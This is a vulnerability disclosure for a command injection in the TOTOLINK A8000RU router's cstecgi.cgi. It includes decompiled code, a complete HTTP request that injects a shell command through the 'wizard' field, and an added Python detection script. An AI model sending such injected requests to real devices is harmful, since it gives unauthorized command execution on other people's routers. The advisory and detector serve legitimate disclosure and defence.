# A8000RU Command Injection Vulnerability Summary

## Vulnerability Overview

A command injection vulnerability was identified in the `cstecgi.cgi` component of the TOTOLINK A8000RU router. Attackers can execute arbitrary operating system commands by crafting malicious requests that exploit the `wizard` parameter.

## Affected Scope

- **Vendor**: TOTOLINK
- **Product**: A8000RU
- **Version**: 7.1cu.643_b20200521

## Remediation

No specific remediation is currently provided on the vendor's page. It is recommended to contact the vendor to obtain updates or patches.

## Proof of Concept (PoC)

### Code Snippet

```c
int v42; // [sp+9Ch] [-4h]

memset(v20, 0, sizeof(v20));
var = websGetVar(a1, "proto", "1");
memset(v30, 0, sizeof(v30));
// "wizard" comes straight from the request and is stored without validation
v0 = websGetVar(a1, "wizard", "0");
Uci_Set_Str(12, "main", "wizard", v0);
Uci_Set_Str(29, "12tp", "enable", "0");
Uci_Set_Str(29, "ntp", "enable", "0");
if ( !strcmp(var, "0") )
{
  v5 = websGetVar(a1, "staticIp", "");
}
```

### HTTP Request Example

```http
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.6.2
Content-Length: 72
X-Requested-With: XMLHttpRequest
Accept-Language: en-US,en;q=0.9
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Origin: http://192.168.6.2
Referer: http://192.168.6.2/basic/index.html
Accept-Encoding: gzip, deflate, br
Cookie: SESSION_ID=21774537321:2
Connection: keep-alive

{"topicUrl":"setWizardCfg","wizard":"ls>./setWizardCfg.txt"}
```

### Result

Upon submitting the above HTTP request, a `.txt` file was successfully created, containing the list of filenames from the directory. This confirms that the command `ls>./setWizardCfg.txt` was executed successfully.
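
### Detection Example

A detection-side check for the request shown above, as an added example that is not part of the original advisory or the vendor's code: it flags `setWizardCfg` bodies whose `wizard` value is anything other than a short numeric flag. The function names, the `exampleOtherTopic` name and the rule that legitimate values are one or two digits (inferred from the handler's default of `"0"`) are assumptions, and the sample bodies are constructed apart from the one copied from the request above.

```python
import json
import re

# Assumption: a legitimate "wizard" value is a short decimal flag
# (the handler on this page defaults it to "0").
WIZARD_FLAG = re.compile(r"[0-9]{1,2}")
# Characters a shell interprets; reported to explain why a value was flagged.
SHELL_META = set(";|&`$<>(){}\\\"' \t\r\n")


def inspect_body(body):
    """Return None if the body needs no attention, else a finding dict.

    The body is parsed as JSON whatever the Content-Type header says: the
    request on this page declares form-urlencoded but carries JSON.
    """
    try:
        msg = json.loads(body)
    except ValueError:
        return None
    if not isinstance(msg, dict) or msg.get("topicUrl") != "setWizardCfg":
        return None
    if "wizard" not in msg:
        return None  # handler falls back to its default
    value = str(msg["wizard"])
    if WIZARD_FLAG.fullmatch(value):
        return None
    return {"value": value,
            "metachars": sorted(c for c in set(value) if c in SHELL_META)}


def scan(bodies):
    """Return (index, finding) pairs for every flagged body."""
    hits = []
    for i, b in enumerate(bodies):
        finding = inspect_body(b)
        if finding is not None:
            hits.append((i, finding))
    return hits


# Constructed sample bodies; the second is the body from the request above.
SAMPLES = [
    '{"topicUrl":"setWizardCfg","wizard":"1","proto":"1"}',
    '{"topicUrl":"setWizardCfg","wizard":"ls>./setWizardCfg.txt"}',
    '{"topicUrl":"exampleOtherTopic","wizard":"a;b"}',
    'not json at all',
]

if __name__ == "__main__":
    for idx, finding in scan(SAMPLES):
        print(idx, finding)
```

The same allowlist, applied in a reverse proxy or request filter in front of the management interface, rejects the request before it reaches `cstecgi.cgi`.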